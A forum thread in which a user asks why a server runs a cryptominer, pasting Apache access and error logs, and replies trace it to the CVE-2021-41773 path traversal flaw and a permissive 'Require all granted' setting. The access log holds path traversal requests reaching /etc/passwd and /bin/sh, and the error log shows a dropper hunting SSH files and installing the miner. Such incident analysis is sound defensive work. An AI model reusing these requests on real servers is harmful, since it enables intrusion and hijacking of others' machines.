You are not logged in.

Pages: 1

#1 2021-10-07 09:23:40

idiot_user_113
Member
Registered: 2021-10-07
Posts: 2

My Arch server got hacked. Help me find out why

I found my Arch server having high CPU+RAM usage, and htop displayed the process kdevtmpfsi running as user http was responsible for this. Googling the process name reveals that it is some kind of cryptocurrency miner that has been installed. https://stackoverflow.com/questions/601 … entire-cpu

Looking at the logs, it seems like they have tried using a shellshock-like vulnerability, but I thought this was patched a long time ago? In error_log, at 19:01:07 you clearly see that they did manage to run a script through my Apache web server. Anyone has any idea, how they could have managed to get in to my machine? What should I do to patch this?


/var/log/httpd/access_log

194.76.224.239 - - [06/Oct/2021:16:36:02 +0300] "GET /cgi-bin/../../../../../../../../../etc/passwd HTTP/1.1" 500 1066
194.76.224.239 - - [06/Oct/2021:16:36:02 +0300] "GET -- HTTP/1.0" 400 959
194.76.224.239 - - [06/Oct/2021:16:38:16 +0300] "GET / HTTP/1.0" 400 959
194.76.224.239 - - [06/Oct/2021:16:38:16 +0300] "GET /cgi-bin/../../../../../../../../../etc/passwd HTTP/1.1" 500 1066
112.32.12.53 - - [06/Oct/2021:17:56:34 +0300] "GET /index.php HTTP/1.1" 200 633
112.32.12.53 - - [06/Oct/2021:17:56:35 +0300] "POST /cgi-bin/../../../../bin/sh HTTP/1.1" 200 3161
112.32.12.53 - - [06/Oct/2021:17:56:38 +0300] "GET /index.php HTTP/1.1" 200 633
112.32.12.53 - - [06/Oct/2021:17:56:38 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
112.32.12.53 - - [06/Oct/2021:17:56:39 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
203.96.177.127 - - [06/Oct/2021:18:12:06 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
141.101.146.133 - - [06/Oct/2021:19:01:07 +0300] "GET /cgi-bin/../../../../etc/passwd HTTP/1.1" 500 1066
192.3.194.202 - - [06/Oct/2021:19:02:22 +0300] "GET /cgi-bin/../../../../bin/sh HTTP/1.1" 500 1085
192.3.194.202 - - [06/Oct/2021:19:43:21 +0300] "GET /cgi-bin/../../../../bin/sh HTTP/2.0" 500 -
47.254.128.196 - - [06/Oct/2021:20:28:52 +0300] "GET /cgi-bin/../../../../etc/hosts HTTP/1.1" 500 1065

/var/log/httpd/error_log

[Wed Oct 06 16:36:02.029676 2021] [cgid:error] [pid 1194772:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 16:36:02.057142 2021] [cgid:error] [pid 864132:tid 139923894023744] [client 194.76.224.239:39476] End of script output before headers: passwd
[Wed Oct 06 16:38:16.267657 2021] [cgid:error] [pid 1194811:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 16:38:16.268391 2021] [cgid:error] [pid 704249:tid 139924447680064] [client 194.76.224.239:48508] End of script output before headers: passwd
[Wed Oct 06 17:56:38.343973 2021] [cgid:error] [pid 1212974:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 17:56:38.408540 2021] [cgid:error] [pid 864132:tid 139923348760128] [client 112.32.12.53:12528] End of script output before headers: passwd
[Wed Oct 06 17:56:39.118666 2021] [cgid:error] [pid 1212975:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 17:56:39.119656 2021] [cgid:error] [pid 704249:tid 139924338574912] [client 112.32.12.53:12538] End of script output before headers: passwd
[Wed Oct 06 18:12:06.416273 2021] [cgid:error] [pid 1217432:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 18:12:06.458753 2021] [cgid:error] [pid 704249:tid 139924447680064] [client 203.96.177.127:38722] End of script output before headers: passwd
[Wed Oct 06 19:01:07.547973 2021] [cgid:error] [pid 1226306:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/passwd' failed
[Wed Oct 06 19:01:07.548918 2021] [cgid:error] [pid 704249:tid 139924330182208] [client 141.101.146.133:64872] End of script output before headers: passwd
bash: line 5: ulimit: max user processes: cannot modify limit: Operation not permitted
sysctl: permission denied on key "vm.nr_hugepages"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
[Wed Oct 06 19:02:24.264597 2021] [cgid:error] [pid 864132:tid 139923348760128] [client 192.3.194.202:41144] malformed header from script 'sh': Bad header: DER Uninstalled
chattr: No such file or directory while trying to stat /tmp/dbused
bash: line 68: /etc/cron.d/root: No such file or directory
bash: line 69: /etc/cron.d/apache: No such file or directory
bash: line 70: /etc/cron.d/nginx: No such file or directory
bash: line 71: /var/spool/cron/root: No such file or directory
mkdir: cannot create directory '/var/spool/cron': Permission denied
bash: line 73: /var/spool/cron/crontabs/root: No such file or directory
bash: line 75: /etc/cron.hourly/oanacroner1: Permission denied
chmod: cannot access '/etc/cron.hourly/oanacroner1': No such file or directory
kill: not enough arguments
bash: line 278: crontab: command not found
bash: line 282: crontab: command not found
bash: line 284: crontab: command not found
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
cat: /srv/http/.bash_history: No such file or directory
cat: '/home/*/.bash_history': No such file or directory
cat: /root/.bash_history: Permission denied
cat: '/srv/http/*/.ssh/known_hosts': No such file or directory
cat: '/home/*/.ssh/known_hosts': No such file or directory
cat: /root/.ssh/known_hosts: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
chattr 1.46.4 (18-Aug-2021)
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
bash: /tmp/xms: No such file or directory
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
bash: line 5: ulimit: max user processes: cannot modify limit: Operation not permitted
sysctl: permission denied on key "vm.nr_hugepages"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
kill: cannot find process "-"
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
kill: not enough arguments
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
[Wed Oct 06 19:43:25.221446 2021] [cgid:error] [pid 864132:tid 139924698936896] [client 192.3.194.202:33994] malformed header from script 'sh': Bad header: DER Uninstalled
chattr: Operation not supported while reading flags on /tmp/dbused
bash: line 68: /etc/cron.d/root: No such file or directory
bash: line 69: /etc/cron.d/apache: No such file or directory
bash: line 70: /etc/cron.d/nginx: No such file or directory
bash: line 71: /var/spool/cron/root: No such file or directory
mkdir: cannot create directory '/var/spool/cron': Permission denied
bash: line 73: /var/spool/cron/crontabs/root: No such file or directory
bash: line 75: /etc/cron.hourly/oanacroner1: Permission denied
chmod: cannot access '/etc/cron.hourly/oanacroner1': No such file or directory
kill: not enough arguments
main: line 269: /home/http/cruner: No such file or directory
bash: line 278: crontab: command not found
bash: line 282: crontab: command not found
bash: line 284: crontab: command not found
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
cat: /srv/http/.ssh/config: No such file or directory
cat: '/home/*/.ssh/config': No such file or directory
cat: /root/.ssh/config: Permission denied
cat: /srv/http/.bash_history: No such file or directory
cat: '/home/*/.bash_history': No such file or directory
cat: /root/.bash_history: Permission denied
cat: '/srv/http/*/.ssh/known_hosts': No such file or directory
cat: '/home/*/.ssh/known_hosts': No such file or directory
cat: /root/.ssh/known_hosts: Permission denied
find: '/root': Permission denied
find: '/home/me': Permission denied
find: '/home/lost+found': Permission denied
chattr 1.46.4 (18-Aug-2021)
chattr: No such file or directory while trying to stat /etc/cron.d/root
chattr: No such file or directory while trying to stat /etc/cron.d/apache
chattr: No such file or directory while trying to stat /var/spool/cron/root
chattr: No such file or directory while trying to stat /var/spool/cron/crontabs/root
chattr: No such file or directory while trying to stat /etc/cron.hourly/oanacroner1
chattr: No such file or directory while trying to stat /etc/init.d/down
bash: /tmp/xms: No such file or directory
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
[Wed Oct 06 20:28:52.624621 2021] [cgid:error] [pid 1235015:tid 139924889423168] (13)Permission denied: AH01241: exec of '/etc/hosts' failed
[Wed Oct 06 20:28:52.674961 2021] [cgid:error] [pid 864132:tid 139924422501952] [client 47.254.128.196:32772] End of script output before headers: hosts
sh: line 1: nvidia-smi: command not found
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
[Wed Oct 06 22:08:49.897426 2021] [proxy_fcgi:error] [pid 864132:tid 139923323582016] [client 143.110.158.84:51044] AH01071: Got error 'Primary script unknown'
[Wed Oct 06 22:08:50.764807 2021] [proxy_fcgi:error] [pid 864132:tid 139924447680064] [client 143.110.158.84:59808] AH01071: Got error 'Primary script unknown'
cat: /tmp/sparte.txt: No such file or directory
Traceback (most recent call last):
  File "<string>", line 1, in <module>
AttributeError: module 'urllib' has no attribute 'urlopen'
chattr: No such file or directory while trying to stat /etc/ld.so.preload
chattr: No such file or directory while trying to stat /var/spool/cron
chattr: No such file or directory while trying to stat /etc/crontab
ERROR: You need to be root to run this script
Fatal: can't open lock file /run/xtables.lock: Permission denied
bash: line 11: /proc/sys/kernel/nmi_watchdog: Permission denied
bash: line 12: /etc/sysctl.conf: Permission denied
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
pkill: killing pid 1014846 failed: Operation not permitted
cat: /tmp/.X11-unix/01: No such file or directory
cat: /tmp/.X11-unix/11: No such file or directory
cat: /tmp/.X11-unix/22: No such file or directory
cat: /tmp/.pg_stat.0: No such file or directory
cat: /tmp/.pg_stat.1: No such file or directory
cat: /data/./oka.pid: No such file or directory
kill: cannot find process "-"
kill: sending signal to 1193534 failed: Operation not permitted
kill: sending signal to 1089 failed: Operation not permitted
md5sum: /tmp/kinsing: No such file or directory
/tmp/kinsing is not 648effa354b3cbaad87b45f48d59c616, actual 
chmod: cannot access '/tmp/kinsing': No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
  6 13.9M    6  935k    0     0  1098k      0  0:00:13 --:--:--  0:00:13 1097k
 15 13.9M   15 2184k    0     0  1179k      0  0:00:12  0:00:01  0:00:11 1178k
 23 13.9M   23 3300k    0     0  1151k      0  0:00:12  0:00:02  0:00:10 1151k
 29 13.9M   29 4265k    0     0  1103k      0  0:00:12  0:00:03  0:00:09 1103k
 37 13.9M   37 5376k    0     0  1105k      0  0:00:12  0:00:04  0:00:08 1105k
 46 13.9M   46 6620k    0     0  1131k      0  0:00:12  0:00:05  0:00:07 1136k
 55 13.9M   55 7869k    0     0  1148k      0  0:00:12  0:00:06  0:00:06 1136k
 63 13.9M   63 9116k    0     0  1161k      0  0:00:12  0:00:07  0:00:05 1166k
 72 13.9M   72 10.1M    0     0  1171k      0  0:00:12  0:00:08  0:00:04 1223k
 81 13.9M   81 11.3M    0     0  1178k      0  0:00:12  0:00:09  0:00:03 1249k
 89 13.9M   89 12.5M    0     0  1184k      0  0:00:12  0:00:10  0:00:02 1246k
 98 13.9M   98 13.7M    0     0  1184k      0  0:00:12  0:00:11  0:00:01 1233k
100 13.9M  100 13.9M    0     0  1183k      0  0:00:12  0:00:12 --:--:-- 1226k
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
md5sum: /tmp/libsystem.so: No such file or directory
/tmp/libsystem.so is not ccef46c7edf9131ccffc47bd69eb743b, actual 
chmod: cannot access '/tmp/libsystem.so': No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 26800  100 26800    0     0   201k      0 --:--:-- --:--:-- --:--:--  202k
/tmp/libsystem.so is ccef46c7edf9131ccffc47bd69eb743b
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed

  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 26800  100 26800    0     0   242k      0 --:--:-- --:--:-- --:--:--  244k
/tmp/libsystem.so is ccef46c7edf9131ccffc47bd69eb743b
main: line 239: /etc/ld.so.preload: Permission denied
main: line 243: crontab: command not found
main: line 243: crontab: command not found
main: line 244: crontab: command not found
main: line 244: crontab: command not found
main: line 245: crontab: command not found
main: line 245: crontab: command not found
main: line 246: crontab: command not found
main: line 246: crontab: command not found
main: line 247: crontab: command not found
main: line 247: crontab: command not found
main: line 248: crontab: command not found
main: line 248: crontab: command not found
main: line 249: crontab: command not found
main: line 249: crontab: command not found
main: line 250: crontab: command not found
main: line 250: crontab: command not found
main: line 251: crontab: command not found
main: line 251: crontab: command not found
main: line 252: crontab: command not found
main: line 252: crontab: command not found
main: line 253: crontab: command not found
main: line 253: crontab: command not found
main: line 254: crontab: command not found
main: line 254: crontab: command not found
main: line 255: crontab: command not found
main: line 255: crontab: command not found
main: line 256: crontab: command not found
main: line 256: crontab: command not found
main: line 257: crontab: command not found
main: line 257: crontab: command not found
main: line 258: crontab: command not found
main: line 258: crontab: command not found
main: line 259: crontab: command not found
main: line 259: crontab: command not found
main: line 260: crontab: command not found
main: line 260: crontab: command not found
main: line 261: crontab: command not found
main: line 261: crontab: command not found
main: line 262: crontab: command not found
main: line 262: crontab: command not found
main: line 263: crontab: command not found
main: line 263: crontab: command not found
main: line 264: crontab: command not found
main: line 264: crontab: command not found
main: line 265: crontab: command not found
main: line 265: crontab: command not found
main: line 266: crontab: command not found
main: line 266: crontab: command not found
main: line 267: crontab: command not found
main: line 267: crontab: command not found
main: line 268: crontab: command not found
main: line 268: crontab: command not found
main: line 269: crontab: command not found
main: line 269: crontab: command not found
main: line 270: crontab: command not found
main: line 270: crontab: command not found
main: line 271: crontab: command not found
main: line 271: crontab: command not found
main: line 272: crontab: command not found
main: line 272: crontab: command not found
main: line 273: crontab: command not found
main: line 273: crontab: command not found
main: line 274: crontab: command not found
main: line 274: crontab: command not found
main: line 275: crontab: command not found
main: line 275: crontab: command not found
main: line 276: crontab: command not found
main: line 276: crontab: command not found
main: line 277: crontab: command not found
main: line 277: crontab: command not found
main: line 278: crontab: command not found
main: line 278: crontab: command not found
main: line 279: crontab: command not found
main: line 279: crontab: command not found
main: line 280: crontab: command not found
main: line 280: crontab: command not found
main: line 281: crontab: command not found
main: line 281: crontab: command not found
main: line 282: crontab: command not found
main: line 282: crontab: command not found
main: line 283: crontab: command not found
main: line 283: crontab: command not found
main: line 284: crontab: command not found
main: line 284: crontab: command not found
main: line 285: crontab: command not found
main: line 285: crontab: command not found
main: line 286: crontab: command not found
main: line 286: crontab: command not found
bash: line 329: crontab: command not found
bash: line 336: crontab: command not found
bash: line 335: echo: write error: Broken pipe
chattr: No such file or directory while trying to stat /etc/ld.so.preload
chattr: No such file or directory while trying to stat /var/spool/cron
chattr: No such file or directory while trying to stat /etc/crontab
ERROR: You need to be root to run this script
Fatal: can't open lock file /run/xtables.lock: Permission denied
bash: line 11: /proc/sys/kernel/nmi_watchdog: Permission denied
bash: line 12: /etc/sysctl.conf: Permission denied
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
pkill: killing pid 1014846 failed: Operation not permitted
cat: /tmp/.X11-unix/01: No such file or directory
cat: /tmp/.X11-unix/11: No such file or directory
cat: /tmp/.X11-unix/22: No such file or directory
cat: /tmp/.pg_stat.0: No such file or directory
cat: /tmp/.pg_stat.1: No such file or directory
cat: /data/./oka.pid: No such file or directory
kill: cannot find process "-"
kill: sending signal to 1193534 failed: Operation not permitted
kill: sending signal to 1089 failed: Operation not permitted
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
/tmp/libsystem.so is ccef46c7edf9131ccffc47bd69eb743b
main: line 239: /etc/ld.so.preload: Permission denied
main: line 243: crontab: command not found
main: line 243: crontab: command not found
main: line 244: crontab: command not found
main: line 244: crontab: command not found
main: line 245: crontab: command not found
main: line 245: crontab: command not found
main: line 246: crontab: command not found
main: line 246: crontab: command not found
main: line 247: crontab: command not found
main: line 247: crontab: command not found
main: line 248: crontab: command not found
main: line 248: crontab: command not found
main: line 249: crontab: command not found
main: line 249: crontab: command not found
main: line 250: crontab: command not found
main: line 250: crontab: command not found
main: line 251: crontab: command not found
main: line 251: crontab: command not found
main: line 252: crontab: command not found
main: line 252: crontab: command not found
main: line 253: crontab: command not found
main: line 253: crontab: command not found
main: line 254: crontab: command not found
main: line 254: crontab: command not found
main: line 255: crontab: command not found
main: line 255: crontab: command not found
main: line 256: crontab: command not found
main: line 256: crontab: command not found
main: line 257: crontab: command not found
main: line 257: crontab: command not found
main: line 258: crontab: command not found
main: line 258: crontab: command not found
main: line 259: crontab: command not found
main: line 259: crontab: command not found
main: line 260: crontab: command not found
main: line 260: crontab: command not found
main: line 261: crontab: command not found
main: line 261: crontab: command not found
main: line 262: crontab: command not found
main: line 262: crontab: command not found
main: line 263: crontab: command not found
main: line 263: crontab: command not found
main: line 264: crontab: command not found
main: line 264: crontab: command not found
main: line 265: crontab: command not found
main: line 265: crontab: command not found
main: line 266: crontab: command not found
main: line 266: crontab: command not found
main: line 267: crontab: command not found
main: line 267: crontab: command not found
main: line 268: crontab: command not found
main: line 268: crontab: command not found
main: line 269: crontab: command not found
main: line 269: crontab: command not found
main: line 270: crontab: command not found
main: line 270: crontab: command not found
main: line 271: crontab: command not found
main: line 271: crontab: command not found
main: line 272: crontab: command not found
main: line 272: crontab: command not found
main: line 273: crontab: command not found
main: line 273: crontab: command not found
main: line 274: crontab: command not found
main: line 274: crontab: command not found
main: line 275: crontab: command not found
main: line 275: crontab: command not found
main: line 276: crontab: command not found
main: line 276: crontab: command not found
main: line 277: crontab: command not found
main: line 277: crontab: command not found
main: line 278: crontab: command not found
main: line 278: crontab: command not found
main: line 279: crontab: command not found
main: line 279: crontab: command not found
main: line 280: crontab: command not found
main: line 280: crontab: command not found
main: line 281: crontab: command not found
main: line 281: crontab: command not found
main: line 282: crontab: command not found
main: line 282: crontab: command not found
main: line 283: crontab: command not found
main: line 283: crontab: command not found
main: line 284: crontab: command not found
main: line 284: crontab: command not found
main: line 285: crontab: command not found
main: line 285: crontab: command not found
main: line 286: crontab: command not found
main: line 286: crontab: command not found
bash: line 329: crontab: command not found
bash: line 336: crontab: command not found
bash: line 335: echo: write error: Broken pipe

Last edited by idiot_user_113 (2021-10-07 09:35:15)

Offline

#2 2021-10-07 10:16:54

Morta
Member
Registered: 2019-07-07
Posts: 655

Re: My Arch server got hacked. Help me find out why

A hacked system is dead. Once hacked you could hacked more than once.

Set it new up.

Offline

#3 2021-10-07 10:19:35

sabroad
Member
Registered: 2015-05-24
Posts: 242

Re: My Arch server got hacked. Help me find out why

19:02:22 Looks like directory traversal to me

If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability https://httpd.apache.org/security/vulne … es_24.html
9:28 AM · Oct 5, 2021

https://www.tenable.com/blog/cve-2021-4 … -exploited

--
saint_abroad

Offline

#4 2021-10-07 11:17:28

idiot_user_113
Member
Registered: 2021-10-07
Posts: 2

Re: My Arch server got hacked. Help me find out why

sabroad wrote:

19:02:22 Looks like directory traversal to me

If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability https://httpd.apache.org/security/vulne … es_24.html
9:28 AM · Oct 5, 2021

https://www.tenable.com/blog/cve-2021-4 … -exploited

Thanks very much for leading me in the right direction. This indeed seems to be the way they got in. And indeed for some stupid reason, I had the following config which enabled the exploit:

<Directory />
    Require all granted
</Directory>

Offline

Pages: 1

Board footer

Powered by FluxBB